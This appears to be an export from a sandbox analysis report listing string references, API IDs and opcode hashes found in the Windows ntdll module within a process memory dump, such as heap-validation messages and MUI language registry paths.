                                                      • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                      • API String ID: 3446177414-1700792311
                                                      • Opcode ID: aee2cc06eb828f775a41c5556ccf0c5ec5e5169349c023d13d1513fc6f222228
                                                      • Instruction ID: 8fd965410609ee457f3d5552ebe37feb269598cce3afcc550c4a750667f92c0d
                                                      • Opcode Fuzzy Hash: aee2cc06eb828f775a41c5556ccf0c5ec5e5169349c023d13d1513fc6f222228
                                                      • Instruction Fuzzy Hash: BFD1FC75508788DFDB22CF68C444AADBBF1FF6A324F04804AE455AB722C739A981CF11
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: DebugPrintTimes
                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                      • API String ID: 3446177414-1745908468
                                                      • Opcode ID: d95a45f8e3d29935bb09a360ae19babfd9096b83fea68b5994b62d350c9ec079
                                                      • Instruction ID: 2d8711d3a383e7e7d750fc9373448ab8170c0ebb3d7a002d78a222a7b1ab7a04
                                                      • Opcode Fuzzy Hash: d95a45f8e3d29935bb09a360ae19babfd9096b83fea68b5994b62d350c9ec079
                                                      • Instruction Fuzzy Hash: AC91DA75900688DFDB02CFA8C444BADBBF2AF69324F14805AE455AB361CB3AE941CF51
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                      • API String ID: 0-3591852110
                                                      • Opcode ID: 2b74c93584461c66aa3338de7c0cfd28147f7b0959f8df72273c5a80f52fafec
                                                      • Instruction ID: 8999b818aaae8fa971132e744de2ff1a6bbe120189143ac85cc8f1d98795e57b
                                                      • Opcode Fuzzy Hash: 2b74c93584461c66aa3338de7c0cfd28147f7b0959f8df72273c5a80f52fafec
                                                      • Instruction Fuzzy Hash: F312BC74A00646DFEB25CF28C484BBABBE1FF29364F148459E4968F751E738E884CB51
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                      • API String ID: 0-3532704233
                                                      • Opcode ID: c99cb60c05a25408060c9b5bd8c053a7cf949c137598e41f432ad93a26c5887f
                                                      • Instruction ID: a550a722a7ec576fd4904336b21fd3896c2fae0fd61304899131234473bdb911
                                                      • Opcode Fuzzy Hash: c99cb60c05a25408060c9b5bd8c053a7cf949c137598e41f432ad93a26c5887f
                                                      • Instruction Fuzzy Hash: 20B19CB55083159BD711CF28C590B5BBBE9BB887A4F41492EF898EB300D775D908CB93
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: DebugPrintTimes
                                                      • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                      • API String ID: 3446177414-3570731704
                                                      • Opcode ID: 59e5b2e3ad6bcc31bcce8feb71ff9a6eeefbfb25b464db8495d58404d5155485
                                                      • Instruction ID: c1b83ffda03d244106bef12ea046b44f6d407550374baf43773273fe73b4c2e1
                                                      • Opcode Fuzzy Hash: 59e5b2e3ad6bcc31bcce8feb71ff9a6eeefbfb25b464db8495d58404d5155485
                                                      • Instruction Fuzzy Hash: 69923675E01329DFEB20CF28C844B99B7B6BF54364F1581EAD949A7290DB349E80CF52
                                                      APIs
                                                      • RtlDebugPrintTimes.NTDLL ref: 3782D959
                                                        • Part of subcall function 37804859: RtlDebugPrintTimes.NTDLL ref: 378048F7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: DebugPrintTimes
                                                      • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 3446177414-1975516107
                                                      • Opcode ID: 88e6db66afc06ce9583780a70e6ccf6b046f3e451f0e195fcd783daa605c55cc
                                                      • Instruction ID: 8cfbbc722bf622f99ce93fcaa1a77870870573dca48569c9a3cf170698b4b4f4
                                                      • Opcode Fuzzy Hash: 88e6db66afc06ce9583780a70e6ccf6b046f3e451f0e195fcd783daa605c55cc
                                                      • Instruction Fuzzy Hash: E651E175A00349DFDB04DFA8C485B9DBFB1BF68318F604569D8107B281DB78A882DFA1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                      • API String ID: 0-3063724069
                                                      • Opcode ID: 1bef7e0da65ed308a8f525a656bbb94850447d0ce8318238fe586c46cd842bad
                                                      • Instruction ID: e71faa17d0f8b6b3b97d1d6a965cac76cca99e00d2524ba3ea22ef6b199e6c1c
                                                      • Opcode Fuzzy Hash: 1bef7e0da65ed308a8f525a656bbb94850447d0ce8318238fe586c46cd842bad
                                                      • Instruction Fuzzy Hash: 2CD1E2B2808315AFE722CE54C840BAFB7E8AFE9764F40093DF99497150D774D94A8B93
                                                      Strings
                                                      • @, xrefs: 377FD0FD
                                                      • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 377FD0CF
                                                      • @, xrefs: 377FD2AF
                                                      • Control Panel\Desktop\LanguageConfiguration, xrefs: 377FD196
                                                      • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 377FD262
                                                      • @, xrefs: 377FD313
                                                      • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 377FD146
                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 377FD2C3
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                      • API String ID: 0-1356375266
                                                      • Opcode ID: 82156468731cdde5fa7535603ea84751bd8bdc815b761e73102955abf7e16604
                                                      • Instruction ID: c4a64d01d2d86c41292b87596707102942aab9147a68ab29614dfbd023cdc298
                                                      • Opcode Fuzzy Hash: 82156468731cdde5fa7535603ea84751bd8bdc815b761e73102955abf7e16604
                                                      • Instruction Fuzzy Hash: A8A17C718087459FE311CF24C990B9BBBE8BB98765F404D2EF598AA240D775D908CF93
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                      • API String ID: 0-523794902
                                                      • Opcode ID: d16aa5d65a98fa1cfa403c5c9768a536dba0fade4c557a1149be4fc34527f2a5
                                                      • Instruction ID: 5071cbe0cfa41b3245dc3a14c41acf81923234fe87761b4e9a3febbdf998b205
                                                      • Opcode Fuzzy Hash: d16aa5d65a98fa1cfa403c5c9768a536dba0fade4c557a1149be4fc34527f2a5
                                                      • Instruction Fuzzy Hash: 2342CC75208381CFD301CF28C984B2ABBE5BF98364F14496DE8958F351DB39E946CB52
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                      • API String ID: 0-122214566
                                                      • Opcode ID: 3832ea02da1c48d0b8dbe4b37bfe3c2f9733989fa69388bcfbfa7f4248dfd7e8
                                                      • Instruction ID: 5ce3be58f3459222a63f561833fdde124388567f4e42fba3a7edfe0011e678b5
                                                      • Opcode Fuzzy Hash: 3832ea02da1c48d0b8dbe4b37bfe3c2f9733989fa69388bcfbfa7f4248dfd7e8
                                                      • Instruction Fuzzy Hash: 00C18D70A00359AFEB148F6CCC81BBEBFA5AF65314F1080A9E815DF680DB74D854DB92
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                      • API String ID: 0-4253913091
                                                      • Opcode ID: 3c3b544f579e85c5c2acd2211151769b4c1b07306002fd34b5f1e2dcbb943d0e
                                                      • Instruction ID: aed02e856a29c7ba32b33bbc8dbeb47a47e85f5bd0b77c6a2f55a74e5d49d7ec
                                                      • Opcode Fuzzy Hash: 3c3b544f579e85c5c2acd2211151769b4c1b07306002fd34b5f1e2dcbb943d0e
                                                      • Instruction Fuzzy Hash: C2F1B974A0160AEFEB04CF69C894B6AB7B6FF64314F1081A9E515DB381DB34E981CF91
                                                      Strings
                                                      • RTL: Re-Waiting, xrefs: 3787031E
                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 378702E7
                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 378702BD
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                      • API String ID: 0-2474120054
                                                      • Opcode ID: c84c9fe09a05c128b8d519fe7b9f2882646e1fc324138a8bf87af379d2b3cdec
                                                      • Instruction ID: 9e903e784d56b3984f126aea9f6b9e628d5a0c1ec20592f4dd217e96e9abd148
                                                      • Opcode Fuzzy Hash: c84c9fe09a05c128b8d519fe7b9f2882646e1fc324138a8bf87af379d2b3cdec
                                                      • Instruction Fuzzy Hash: 63E1AD75608785DFE711CF28C880B1AB7E0AFA4764F100A6DF5A58B2D1DB74E885CB52
                                                      Strings
                                                      • Kernel-MUI-Language-SKU, xrefs: 3782542B
                                                      • Kernel-MUI-Language-Disallowed, xrefs: 37825352
                                                      • WindowsExcludedProcs, xrefs: 3782522A
                                                      • Kernel-MUI-Language-Allowed, xrefs: 3782527B
                                                      • Kernel-MUI-Number-Allowed, xrefs: 37825247
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                      • API String ID: 0-258546922
                                                      • Opcode ID: 54b1ae24f5fc17a3524830585e145b332e676bb593ba149db8fe39ccf52d2e57
                                                      • Instruction ID: acdd2d33a110ca3a1d94fdece050f038e240bdde11b9008f24deccf8fc8f8704
                                                      • Opcode Fuzzy Hash: 54b1ae24f5fc17a3524830585e145b332e676bb593ba149db8fe39ccf52d2e57
                                                      • Instruction Fuzzy Hash: 4BF14BB6D51218EFDB01CF98C980ADEBBB9FF18664F50409AE511EB210EB749E41DF90
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: DebugPrintTimes
                                                      • String ID:
                                                      • API String ID: 3446177414-0
                                                      • Opcode ID: a54703a87943d8d4a33a32ed4255897602171e4ca89f199ca3b7933a5793f66b
                                                      • Instruction ID: 032a9b397c78cb7ece92814ba71234e493806005d9a227725e1ed6adc58f7e6f
                                                      • Opcode Fuzzy Hash: a54703a87943d8d4a33a32ed4255897602171e4ca89f199ca3b7933a5793f66b
                                                      • Instruction Fuzzy Hash: C2F10376E006158FDB08CFADC99067EBFF6AFA8210B19416DD466DB380E634EA01CF50
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                      • API String ID: 0-3061284088
                                                      • Opcode ID: b1ffb0a65bc100251d761dd0d64f055a337625b157a052a1ee79dfb4b4080c20
                                                      • Instruction ID: b26ef4cccccfa88cad5d7709ff4d2d0a537114d545fe802c6f61300e37b4b64e
                                                      • Opcode Fuzzy Hash: b1ffb0a65bc100251d761dd0d64f055a337625b157a052a1ee79dfb4b4080c20
                                                      • Instruction Fuzzy Hash: 6B01F776014290DFE215C728E50DFA2BFD4DB62770F24409EE0048F771CBA9A884CE62
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                      • API String ID: 0-3178619729
                                                      • Opcode ID: 587b85c7a7ff098a4852e3c7adb7bcf0546ae2171ee887ad694bb85d7b0910cf
                                                      • Instruction ID: e6b2d1b0fe9c7d1cdff702762cbad7b27a783ebd864856c792b0892dbb612739
                                                      • Opcode Fuzzy Hash: 587b85c7a7ff098a4852e3c7adb7bcf0546ae2171ee887ad694bb85d7b0910cf
                                                      • Instruction Fuzzy Hash: 0813AD74A00319CFEB15CF68C8817A9BBF1BF69324F1485ADD859AB381D738A941CF91
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $$.mui$.mun$SystemResources\
                                                      • API String ID: 0-3047833772
                                                      • Opcode ID: f66baa97712921b54a9c08863b975919d064ee9ce9016c452f273e1d0b14e4f2
                                                      • Instruction ID: b981fc871201877f7fb9a1cbd299caba9aa97d2e6680dbcf94577ff8407618f4
                                                      • Opcode Fuzzy Hash: f66baa97712921b54a9c08863b975919d064ee9ce9016c452f273e1d0b14e4f2
                                                      • Instruction Fuzzy Hash: 4D625B76A00329AFDB21CF54CC44BE9B7B8BF1A354F0041EAE509A7A50DB359E85CF52
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI$\U}7
                                                      • API String ID: 0-4152019566
                                                      • Opcode ID: 721120c883db5278481f54c284f7512c2a66e3d4b1d37e6e12415f47784df916
                                                      • Instruction ID: 741c8821cb7e61a2e20b525b4bf3bc35b93db3088eae0b444d7cb826c416bc9b
                                                      • Opcode Fuzzy Hash: 721120c883db5278481f54c284f7512c2a66e3d4b1d37e6e12415f47784df916
                                                      • Instruction Fuzzy Hash: A4B19D75A05708AFEB15CF6DCD84B9DBBB2AF687A8F144429E951EB680D734E840CF40
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit$\U}7${
                                                      • API String ID: 0-2654065588
                                                      • Opcode ID: 6a6d0441e4c0ce407db4a9827ed1ed86ae8e6635b934cadd8eb5bc0c794aeee8
                                                      • Instruction ID: d91006be1cb00698a3c8e4b755351b68c5bc382e94add2d2d4ed0887860be86b
                                                      • Opcode Fuzzy Hash: 6a6d0441e4c0ce407db4a9827ed1ed86ae8e6635b934cadd8eb5bc0c794aeee8
                                                      • Instruction Fuzzy Hash: 3691C0B9900709EFEB11CF58CC44BAE7BB0EF25768F144195E820AB290D778AE40CF91
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                      • API String ID: 0-2586055223
                                                      • Opcode ID: 9d1725a17aea8a1dffa6249a1ea41d121c8ff858e822a6dc6a4e37233540a600
                                                      • Instruction ID: 99eb4028efd11282e1d5c632c1c89e30c39be9bbb2a5591edd7ce64cfc3b885d
                                                      • Opcode Fuzzy Hash: 9d1725a17aea8a1dffa6249a1ea41d121c8ff858e822a6dc6a4e37233540a600
                                                      • Instruction Fuzzy Hash: 6C61DF762047809FE311CF28CD48F6AB7E9EF94764F040469E9A48F391DB38E845CB66
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                      • API String ID: 0-336120773
                                                      • Opcode ID: d5fcd645409f46caaadd8c1b11252678296061923b9b1463de574bdf87554e2f
                                                      • Instruction ID: 8163d3f3c430e6102ceb9b2062d983f989c2351639d4e938e3b2cbb0bbb8440b
                                                      • Opcode Fuzzy Hash: d5fcd645409f46caaadd8c1b11252678296061923b9b1463de574bdf87554e2f
                                                      • Instruction Fuzzy Hash: 1C310476910204EFEB20CFA8C985F6677E9EF18660F210055F456DF3A1EB35AC44CE66
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
